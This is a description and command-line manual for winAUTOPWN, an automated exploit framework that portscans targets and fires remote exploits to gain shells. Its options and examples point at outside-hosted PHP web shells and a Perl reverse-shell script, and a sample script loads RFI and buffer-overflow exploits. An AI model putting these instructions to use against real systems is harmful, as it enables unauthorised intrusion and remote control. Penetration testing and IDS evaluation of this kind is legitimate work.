WinAUTOPWN:
is a minimal Interactive Exploit Framework which acts as a
frontend for quick systems vulnerability exploitation. It is a
collection of remote exploits using which one can compromise vulnerable
systems. winAUTOPWN takes inputs like IP address, Hostname, CMS Path,
etc. and does a smart multi-threaded portscan for TCP ports 1 to 65535.
Open ports are then recognized and exploits applicable to those ports
are executed with the aim of gaining a remote shell or the ability to
run remote commands in certain cases.
WINDOWS AUTOPWN or winAUTOPWN is an auto shell gaining // security penetration tool.
It can also be used to test IDS, IPS and other monitoring sensors/softwares.
Besides the above, winAUTOPWN can also be used as an efficiency
testing tool for Intrusion Detection Systems (IDS) and Web Application
Filters (WAF). winAUTOPWN has a vast repository of exploits for various
Operating systems like Microsoft Windows, Apple MAC OSX, Linux
(various), BSD systems as well as for well-known services and daemon
software. winAUTOPWN also contains a massive database of Shell Upload
Vulnerability, Remote File Inclusion and Remote Command Execution
exploits. These can be fired one after the other instantly and this can
aide is checking if the WAF is preventing / alerting accordingly against
such threats or no. Similarly shell aiming exploits too can be fired up
in a row to test the strength and effectiveness of IDS and IPS.
WinAUTOPWN also has a BSD based cousin called bsdAUTOPWN. bsdAUTOPWN
is a just like winAUTOPWN but is not an exact recompilation of
winAUTOPWN. It has been written from scratch for and on FreeBSD OS to
match the power and functionality offered by the Operating System. Like
winAUTOPWN, even bsdAUTOPWN has a multi-threaded portscan feature and it
too detects open ports and attempts to exploit them accordingly using
the available exploits in the arsenal. We’ll come to a detailed
discussion about bsdAUTOPWN later.
Windows GUI as well, which takes similar inputs and feeds it to the main winAUTOPWN console:
How to use command-line in winAUTOPWN ?
Command-line usage has always been a mark of a power user in any
console based penetration testing tool. winAUTOPWN’s entire interactive
interface can be pre-fed with values using command line options as
explained below :
-
-skipscan This option can force winAUTOPWN to skip
the port-scan module and use the file OpenPorts.TXT in the directory.
This is a useful feature when you know what open ports are available on
your target system. One can just fill in the port numbers and save the
file. This is also helpful in situations when you want winAUTOPWN to
check for exploits for one or a few particular ports.
Example winAUTOPWN.exe –skipscan
-
-onlyscan This option can force winAUTOPWN to skip
the entire exploit testing modules. Hence, by using this module
winAUTOPWN will only perform a PortScan and will exit after printing the
list of OpenPorts .
Example winAUTOPWN.exe –onlyscan
-
-targetIP This option can be used to provide the
Target IP address of the system being tested. Ensure that you specify
the IP address after it.
Example winAUTOPWN.exe –targetIP 192.168.3.3
-
-targetHOST This option can be used to provide the
Target Hostname of the system being tested. Ensure that you specify the
complete Netbios name for Windows systems on LAN and the entire domain
name for Target Systems on WAN.
Example winAUTOPWN.exe –targetHOST SYSTEM-2
winAUTOPWN.exe –targetHOST www.somewebsite9.com
-
-attackerIP This option can be used to provide
your own IP, which is the Attacker’s IP address of the system from where
winAUTOPWN is being run. Ensure that you specify the IP address after
it.
Example winAUTOPWN.exe –attackerIP 192.168.3.34
-
-cmsPATH This option can be used to specify the
Content Management System directory name in the URL. Generally this is
the first directory name right after the end of the Domain name or the
IP address. Ensure that you specify the correct cmsPATH. You can leave
this blank if you do not intend to test the web application
vulnerability exploits.
Example winAUTOPWN.exe –cmsPATH /xampp
-
-actcmsPATH This option can be used to specify the
Actual Content Management System or the internal Actual CMS Path of the
URL. Generally this is not visible in the URL. A lot of times CMS
packages installed on the webserver have a default path making it easily
guessable. Ensure that you specify the correct actcmsPATH. You can
leave this blank if you do not intend to test the web application
vulnerability exploits.
Example winAUTOPWN.exe –actcmsPATH /Applications/xampp
winAUTOPWN.exe –actcmsPATH /opt/xampp
-
-phpshellPATH This option can be used specify the
path of the online PHP Web-shell which would be used along with the
Remote File Inclusion Vulnerability Exploits. There is a default encoded
PHP web-shell path. To change it, ensure that you specify the correct
phpshellPATH which accepts a variable named CMD to execute system
commands. The GET request should look like
http://shellp.ath/shell.php?CMD=ls
You can leave this blank if you do not intend to test the web application vulnerability exploits.
Example winAUTOPWN.exe –phpshellPATH http://website.moc/folder/r57.txt
-
-actphpshellPATH This option can be used specify
the actual internal path of the online PHP Web-shell which would be used
along with the Remote File Inclusion Vulnerability Exploits. You can
leave this blank if you do not intend to test the web application
vulnerability exploits.
Example winAUTOPWN.exe –actphpshellPATH /var/log/tmp
-
-cmsadminUSR This option can be used specify the
administrator /admin username if known. This is required for a few
web-app exploits to work correctly. You can leave this blank if you do
not intend to test the web application vulnerability exploits.
Example winAUTOPWN.exe –cmsadminUSR admin9
-
-ftpUSR This option can be used specify the FTP
User name if known. This is required for a few FTP exploits to work
correctly. If you leave this blank winAUTOPWN will set an internal
default FTP Username.
Example winAUTOPWN.exe –ftpUSR user6
-
-ftpPASSWD This option can be used specify the FTP
Password if known. This is required for a few FTP exploits to work
correctly. If you leave this blank winAUTOPWN will set an internal
default FTP Password.
Example winAUTOPWN.exe –ftpPASSWD S3cR37P@55W0rD
-
-perlrevshURL This option can be used specify the
path of a remote Perl script which should be able to send a /bin/sh or
an equivalent shell to a remote IP. The script should ideally have the
capability to be invoked as perl . Note that the remote_IP will be your IP to which your target will connect and the remote_port
will be a port opened on your IP. You do not have to worry about
providing parameters to the Perl file or opening the port locally,
winAUTOPWN will automatically handle it, because that’s what WINDOWS
AUTOPWN actually means. Also note that any Perl script with these
capabilities can be used and can be hosted on any webserver. This option
just needs the path to this Perl file. This Perl script will be pointed
to and used in a few exploits in which a remote connect back shell is
used as a payload. There is a default Perl shell path encoded so if you
have no clue or an online resource, you can leave this option blank and
winAUTOPWN will try to handle it on its own.
Example winAUTOPWN.exe –perlrevshURL http://website.moc/various/reverse-shell.pl
-
-mailFROM This option can be used to specify the
sender’s email address to be used in a few SMTP exploits. This field has
a default sender’s email address crafted by winAUTOPWN. It is always root@ where target hostname is the –targetHOST provided earlier. You can set a value to this field to override the default value set.
Example winAUTOPWN.exe –mailFROM admin@some.web.info
-
-mailTO This option can be used specify the
receiver’s email address to be used in a few SMTP Exploits. This field
has a default receiver’s email address crafted by winAUTOPWN. It is
always postmaster@ where target hostname is the –targetHOST provided earlier. You can set a value to this field to override the default value set.
Example winAUTOPWN.exe –mailTO postmaster@some.web.info
-
-proxyIP This option can be used to provide the
Proxy Server IP address. Do note that only a few exploits support
Proxies and that too if you have supplied a Proxy IP and a Proxy port.
Ensure that you specify the correct Proxy IP address after it.
Example winAUTOPWN.exe –proxyIP 192.168.3.80
-
-proxyPORT This option can be used to provide the
Proxy Server Port Number. Do note that only a few exploits support
Proxies and that too if you have supplied a Proxy IP and a Proxy port.
Ensure that you specify the correct Proxy Port Number address after it.
Example winAUTOPWN.exe –proxyIP 8080
What are the other WELF Scripting Terminologies?
can be , , OR (for exe files)
is the filename of the Exploit. Ex: exploitname.exe
is your Target’s IP address. Ex: 10.40.140.1
is your Target’s Hostname. Ex: www.somegate.com OR TSUNAMI-MP11
is your IP. Ex: 10.40.140.144
is the Target CMS Path. Ex: /awstats
is the Actual CMS Path on the disk. Ex: /usr/home/www/awstats
is an online URL for a php shell. Ex: http://www.shell.com/phpshell.txt
is a admin username for the Target CMS.
is FTP/CMS Username
is FTP/CMS Password.
is Proxy IP address to be used for some exploits to pass through
is Proxy Port Number to be used for some exploits to pass through
is the CMS Path with a trailing slah. Ex: /awstats/
is the Actual CMS Path on the disk with a trailing slash. Ex: /usr/home/www/awstats/
is the typical complete address of the Target Hostname alongwith the CMS Path. Ex: www.somesite.com/awstats<
is the typical complete
address of the Target Hostname alongwith the CMS Path with a trailing
slash. Ex: www.somesite.com/awstats/
is the CMS path following the standard http:// . Ex: http://www.somesite.com/awstats
is the Target HostName following the standard http:// . Ex: http://www.somesite.com
is the online URL for a perl reverse connect script. Ex. http://vrac.fifi.be/warehouse/various/reverse-shell.pl
is the sender’s email address to be used in a few SMTP exploits.
is the receiver’s email address to be used in a few SMTP exploits.
Sample welf script (myWELFexploits.txt) with three exploits to be loaded:
PERL webframe_0.76_RFI(c99)-xplt_method3.pl -vuln -shell ^^^^
PYTHON Steamcast(HTTP_Request)_(SEH)_Rem_Buf_Ovrflw_xplt.py 80 100 ^^^^
bitweaver_firecmd.exe ^^^^
To run the above script, as mentioned earlier run
winAUTOPWN.exe –welf myWELFexploits.txt
Download Link : Click Here
Back-up Link : Click Here
Reference link : Click Here
Direct Link : Click Here